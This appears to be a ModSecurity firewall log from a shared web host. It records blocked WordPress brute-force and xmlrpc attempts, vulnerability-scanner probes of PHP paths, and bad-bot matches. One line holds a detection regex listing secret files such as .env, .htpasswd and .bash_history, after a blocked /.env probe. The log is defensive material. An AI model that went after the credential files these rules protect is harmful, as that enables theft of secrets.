[Tue May 26 13:56:58.432384 2026] [security2:error] [pid 560287:tid 560395] [remote 132.148.72.88:46100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVZUpmX5s6sDS3wJVcrmQAA-Wo"]
[Tue May 26 13:56:59.164178 2026] [security2:error] [pid 560287:tid 560514] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVZU5mX5s6sDS3wJVcrrwAAAOA"]
[Tue May 26 13:56:59.164694 2026] [security2:error] [pid 555743:tid 555880] [client 35.175.92.196:38042] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVZU8jqAquC0YaxQjDHqAAAARE"]
[Tue May 26 13:56:59.377106 2026] [security2:error] [pid 555743:tid 555932] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVZU8jqAquC0YaxQjDHqwAAAUU"]
[Tue May 26 13:56:59.377694 2026] [security2:error] [pid 555743:tid 555958] [client 35.175.92.196:30586] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVZU8jqAquC0YaxQjDHqgAAAV8"]
[Tue May 26 13:56:59.449925 2026] [security2:error] [pid 560287:tid 560436] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZU5mX5s6sDS3wJVcrpwAAAJc"]
[Tue May 26 13:56:59.712563 2026] [security2:error] [pid 560287:tid 560550] [client 35.175.92.196:30592] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVZU5mX5s6sDS3wJVcrswAAAQI"]
[Tue May 26 13:57:00.126222 2026] [security2:error] [pid 555743:tid 555940] [client 129.222.147.134:54820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZVMjqAquC0YaxQjDHsQAAAU0"]
[Tue May 26 13:57:00.130486 2026] [security2:error] [pid 555743:tid 555940] [client 129.222.147.134:54820] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZVMjqAquC0YaxQjDHsQAAAU0"]
[Tue May 26 13:57:00.607612 2026] [security2:error] [pid 560287:tid 560432] [client 202.141.30.10:35365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZVJmX5s6sDS3wJVcrwAAAAJM"]
[Tue May 26 13:57:00.607765 2026] [security2:error] [pid 560287:tid 560432] [client 202.141.30.10:35365] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZVJmX5s6sDS3wJVcrwAAAAJM"]
[Tue May 26 13:57:00.902827 2026] [security2:error] [pid 560287:tid 560413] [remote 121.200.216.55:57310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVZVJmX5s6sDS3wJVcrwwAA0Hw"]
[Tue May 26 13:57:01.668234 2026] [security2:error] [pid 555743:tid 555990] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZVcjqAquC0YaxQjDHuwAAAX8"]
[Tue May 26 13:57:03.128766 2026] [security2:error] [pid 555743:tid 555828] [remote 213.246.101.88:58624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.101.246.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVZVsjqAquC0YaxQjDHyQABGlQ"]
[Tue May 26 13:57:03.515196 2026] [security2:error] [pid 555743:tid 555919] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZV8jqAquC0YaxQjDHzAAAATg"]
[Tue May 26 13:57:04.584743 2026] [security2:error] [pid 560287:tid 560491] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZWJmX5s6sDS3wJVcr4QAAAMo"]
[Tue May 26 13:57:05.696987 2026] [security2:error] [pid 560287:tid 560292] [remote 5.78.119.122:55062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVZWZmX5s6sDS3wJVcr8AAAsQQ"]
[Tue May 26 13:57:06.524194 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZWpmX5s6sDS3wJVcr9gAAAPI"]
[Tue May 26 13:57:08.070030 2026] [security2:error] [pid 560287:tid 560406] [remote 57.141.2.3:58124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVZXJmX5s6sDS3wJVcsCgAAxHU"]
[Tue May 26 13:57:08.282281 2026] [security2:error] [pid 555743:tid 555827] [remote 94.76.235.103:56754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVZXMjqAquC0YaxQjDH-AABdlM"]
[Tue May 26 13:57:08.622189 2026] [security2:error] [pid 560287:tid 560495] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZXJmX5s6sDS3wJVcsDwAAAM4"]
[Tue May 26 13:57:09.639899 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:60557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZXZmX5s6sDS3wJVcsIgAAAPw"]
[Tue May 26 13:57:09.640041 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:60557] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZXZmX5s6sDS3wJVcsIgAAAPw"]
[Tue May 26 13:57:09.658455 2026] [security2:error] [pid 560287:tid 560402] [remote 135.181.183.122:36812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.183.181.135.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVZXZmX5s6sDS3wJVcsIQAA63E"]
[Tue May 26 13:57:10.383742 2026] [security2:error] [pid 555743:tid 555971] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZXcjqAquC0YaxQjDICwAAAWw"]
[Tue May 26 13:57:10.536467 2026] [security2:error] [pid 555743:tid 555928] [client 129.222.147.134:1155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZXsjqAquC0YaxQjDIEAAAAUE"]
[Tue May 26 13:57:10.536688 2026] [security2:error] [pid 555743:tid 555928] [client 129.222.147.134:1155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZXsjqAquC0YaxQjDIEAAAAUE"]
[Tue May 26 13:57:11.646613 2026] [security2:error] [pid 555743:tid 555962] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZX8jqAquC0YaxQjDIGQAAAWM"]
[Tue May 26 13:57:11.665919 2026] [security2:error] [pid 560287:tid 560464] [client 202.141.30.10:35445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZX5mX5s6sDS3wJVcsMwAAALE"]
[Tue May 26 13:57:11.666125 2026] [security2:error] [pid 560287:tid 560464] [client 202.141.30.10:35445] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZX5mX5s6sDS3wJVcsMwAAALE"]
[Tue May 26 13:57:14.163301 2026] [security2:error] [pid 555743:tid 555972] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZYcjqAquC0YaxQjDILQAAAW0"]
[Tue May 26 13:57:14.542178 2026] [security2:error] [pid 555743:tid 555978] [client 51.83.6.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZYsjqAquC0YaxQjDIPAAAAXM"], referer: https://www.anujtradingco.com/
[Tue May 26 13:57:14.642919 2026] [security2:error] [pid 555743:tid 555925] [client 168.144.119.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVZYsjqAquC0YaxQjDIRAAAAT4"], referer: http://vcresco.com/
[Tue May 26 13:57:15.305981 2026] [security2:error] [pid 555743:tid 555889] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZYsjqAquC0YaxQjDITgAAARo"]
[Tue May 26 13:57:15.559359 2026] [security2:error] [pid 555743:tid 555789] [remote 154.66.198.148:38816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVZY8jqAquC0YaxQjDIXAABhy0"]
[Tue May 26 13:57:15.599259 2026] [security2:error] [pid 555743:tid 555910] [client 51.83.6.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZY8jqAquC0YaxQjDIXwAAAS8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1509157&moderation-hash=e5adc6f35faba27037f6048fa8ca1044
[Tue May 26 13:57:16.727943 2026] [security2:error] [pid 560287:tid 560494] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZZJmX5s6sDS3wJVcsVAAAAM0"]
[Tue May 26 13:57:17.670545 2026] [security2:error] [pid 560287:tid 560517] [client 106.192.248.115:60875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZZZmX5s6sDS3wJVcsWAAAAOM"]
[Tue May 26 13:57:17.673196 2026] [security2:error] [pid 560287:tid 560517] [client 106.192.248.115:60875] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZZZmX5s6sDS3wJVcsWAAAAOM"]
[Tue May 26 13:57:19.023357 2026] [security2:error] [pid 560287:tid 560444] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZZpmX5s6sDS3wJVcsYgAAAJ4"]
[Tue May 26 13:57:19.702003 2026] [security2:error] [pid 555743:tid 555980] [client 14.228.141.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZZ8jqAquC0YaxQjDIjwAAAXU"]
[Tue May 26 13:57:20.747174 2026] [security2:error] [pid 555743:tid 555902] [client 129.222.147.134:52373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZaMjqAquC0YaxQjDIlwAAASc"]
[Tue May 26 13:57:20.747326 2026] [security2:error] [pid 555743:tid 555902] [client 129.222.147.134:52373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZaMjqAquC0YaxQjDIlwAAASc"]
[Tue May 26 13:57:20.851133 2026] [security2:error] [pid 560287:tid 560421] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZaJmX5s6sDS3wJVcsdgAAAIg"]
[Tue May 26 13:57:21.045876 2026] [security2:error] [pid 560287:tid 560535] [client 20.104.227.76:25889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/wk/index.php"] [unique_id "ahVZaJmX5s6sDS3wJVcsewAAAPU"]
[Tue May 26 13:57:22.508664 2026] [security2:error] [pid 560287:tid 560495] [client 202.141.30.10:35470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZapmX5s6sDS3wJVcsgwAAAM4"]
[Tue May 26 13:57:22.508816 2026] [security2:error] [pid 560287:tid 560495] [client 202.141.30.10:35470] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZapmX5s6sDS3wJVcsgwAAAM4"]
[Tue May 26 13:57:22.643581 2026] [security2:error] [pid 555743:tid 555890] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZasjqAquC0YaxQjDIpAAAARs"]
[Tue May 26 13:57:22.822931 2026] [security2:error] [pid 560287:tid 560490] [client 168.144.119.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVZapmX5s6sDS3wJVcshQAAAMk"], referer: https://vcresco.com/
[Tue May 26 13:57:22.971885 2026] [security2:error] [pid 560287:tid 560541] [client 185.165.240.73:26761] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVZapmX5s6sDS3wJVcsgAAAAPk"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:57:23.310379 2026] [security2:error] [pid 560287:tid 560531] [client 104.245.241.20:24291] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVZapmX5s6sDS3wJVcshwAAAPE"], referer: https://anujtradingco.com
[Tue May 26 13:57:23.699308 2026] [security2:error] [pid 560287:tid 560514] [client 63.178.84.147:47934] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVZa5mX5s6sDS3wJVcsjwAAAOA"], referer: https://thegoodsporting.com
[Tue May 26 13:57:24.264953 2026] [security2:error] [pid 555743:tid 555994] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZa8jqAquC0YaxQjDIuQAAAYM"]
[Tue May 26 13:57:24.412310 2026] [security2:error] [pid 555743:tid 555891] [client 176.65.139.239:55890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.abrindoempresa.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVZbMjqAquC0YaxQjDIvwAAARw"]
[Tue May 26 13:57:25.482061 2026] [security2:error] [pid 560287:tid 560470] [client 20.104.227.76:5160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/inputs.php"] [unique_id "ahVZbZmX5s6sDS3wJVcsnQAAALY"]
[Tue May 26 13:57:26.059109 2026] [security2:error] [pid 555743:tid 555949] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZbcjqAquC0YaxQjDIzQAAAVY"]
[Tue May 26 13:57:26.212797 2026] [security2:error] [pid 560287:tid 560521] [client 216.244.66.241:42220] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/project/yumekikin/"] [unique_id "ahVZbpmX5s6sDS3wJVcspQAAAOc"]
[Tue May 26 13:57:26.212906 2026] [security2:error] [pid 560287:tid 560521] [client 216.244.66.241:42220] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/project/yumekikin/"] [unique_id "ahVZbpmX5s6sDS3wJVcspQAAAOc"]
[Tue May 26 13:57:26.299638 2026] [security2:error] [pid 560287:tid 560515] [client 106.192.248.115:61200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZbpmX5s6sDS3wJVcspwAAAOE"]
[Tue May 26 13:57:26.301416 2026] [security2:error] [pid 560287:tid 560515] [client 106.192.248.115:61200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZbpmX5s6sDS3wJVcspwAAAOE"]
[Tue May 26 13:57:27.857258 2026] [security2:error] [pid 560287:tid 560482] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZb5mX5s6sDS3wJVcstQAAAME"]
[Tue May 26 13:57:28.891513 2026] [security2:error] [pid 555743:tid 555893] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVZcMjqAquC0YaxQjDI6gAAAR4"]
[Tue May 26 13:57:29.407779 2026] [security2:error] [pid 560287:tid 560532] [client 20.104.227.76:5264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/ioxi-o.php"] [unique_id "ahVZcZmX5s6sDS3wJVcszAAAAPI"]
[Tue May 26 13:57:29.511848 2026] [security2:error] [pid 560287:tid 560330] [remote 74.7.241.58:35936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVZcZmX5s6sDS3wJVcs0QAAtSo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
